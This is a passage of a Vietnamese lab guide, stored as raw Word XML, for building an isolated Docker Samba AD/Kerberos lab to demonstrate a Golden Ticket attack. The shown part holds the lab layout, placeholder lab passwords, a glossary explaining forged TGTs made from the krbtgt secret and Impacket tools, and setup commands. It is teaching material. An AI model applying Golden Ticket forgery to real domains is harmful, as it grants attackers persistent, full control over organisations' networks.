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KERBEROS + GOLDEN TICKET</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Docker Lab Demo – AD/KDC khép kín</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hướng dẫn triển khai từng bước trên Docker Desktop / Windows</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Dựng Samba AD DC → kiểm tra Kerberos → mô phỏng Gold Ticket → quan sát xác thực.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="E2F0D9"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Phạm vi an toàn: </w:t>
            </w:r>
            <w:r>
              <w:t>Lab dùng mạng Docker riêng 172.28.0.0/24 và không publish dịch vụ AD/Kerberos ra host. Chỉ dùng các bí mật sinh ra trong lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Kiến trúc lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mô hình gồm ba container: DC/KDC, client hợp lệ và attacker. Docker thay VM ở đây: các thành phần Kerberos/AD vẫn hoạt động theo cùng nguyên lý.</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Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IP lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Domain Controller / KDC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dc01.lab.kerb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>172.28.0.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Samba AD DC + DNS + Kerberos + SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>client01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>172.28.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kinit/klist/smbclient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>attacker01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>172.28.0.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Impacket; mô phỏng secretsdump + ticketer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Thông số lab:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>DNS domain: lab.kerb</w:t>
        <w:br/>
        <w:t>Kerberos realm: LAB.KERB</w:t>
        <w:br/>
        <w:t>NetBIOS domain: LAB</w:t>
        <w:br/>
        <w:t>DC: dc01.lab.kerb</w:t>
        <w:br/>
        <w:t>Administrator: Administrator</w:t>
        <w:br/>
        <w:t>Lab admin password: LabAdmin!2026</w:t>
        <w:br/>
        <w:t>Test user: alice</w:t>
        <w:br/>
        <w:t>Test user password: Alice!2026</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FCE4D6"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Cảnh báo: </w:t>
            </w:r>
            <w:r>
              <w:t>Đây là mật khẩu dành riêng cho lab; không dùng lại ở hệ thống thật.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Bảng thuật ngữ</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Thuật ngữ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Giải thích</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trong lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Active Directory (AD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Quản lý danh tính, máy tính, nhóm và chính sách trong domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Samba AD DC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Domain Controller (DC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Máy chủ xác thực/ủy quyền và lưu dữ liệu domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dc01.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KDC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kerberos Key Distribution Center; cấp vé Kerberos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nằm trong Samba AD DC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kerberos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Giao thức xác thực dựa trên ticket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kinit/klist.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tên miền logic của Kerberos, thường viết hoa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LAB.KERB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Danh tính Kerberos như user@REALM hoặc service/host@REALM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alice@LAB.KERB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TGT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ticket-Granting Ticket; vé dùng để xin service ticket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TGT thật hoặc forged TGT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TGS / Service Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vé dành cho một dịch vụ cụ thể.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SMB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>krbtgt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tài khoản đặc biệt; bí mật của nó liên quan đến việc ký/xác thực TGT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hash chỉ dùng trong lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Privilege Attribute Certificate; thông tin quyền/nhóm trong ticket AD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Có trong ticket AD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Golden Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TGT giả được tạo từ bí mật krbtgt và thông tin domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Demo phần 13–16.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CCACHE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>File credential cache của Kerberos trên Unix/Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>goldenadmin.ccache.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Service Principal Name; định danh dịch vụ Kerberos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SMB/cifs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NT hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hash kiểu NT được dùng trong một số cơ chế AD/Kerberos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hash lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security Identifier của domain/user/group.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Domain SID.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phân giải tên; AD/Kerberos phụ thuộc mạnh vào DNS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>172.28.0.10.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Impacket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bộ công cụ Python cho giao thức Windows/AD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>secretsdump/ticketer.py.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Điều kiện trước khi bắt đầu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Windows + Docker Desktop đang chạy, Docker Engine ở trạng thái Running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Terminal hoặc PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Khoảng 4–6 GB RAM trống cho Docker Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Internet trong lúc pull image/cài package; sau đó lab giao tiếp nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Không dùng hash/ticket của hệ thống thật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker version</w:t>
        <w:br/>
        <w:t>docker compose version</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="E2F0D9"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Giao diện: </w:t>
            </w:r>
            <w:r>
              <w:t>Mở Docker Desktop → chờ Engine Running. Sau đó mở Start → Windows Terminal/PowerShell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Tạo thư mục lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>mkdir $HOME\kerberos-docker-lab</w:t>
        <w:br/>
        <w:t>cd $HOME\kerberos-docker-lab</w:t>
        <w:br/>
        <w:t>mkdir client</w:t>
        <w:br/>
        <w:t>mkdir attacker</w:t>
        <w:br/>
        <w:t>Get-ChildItem</w:t>
      </w:r>
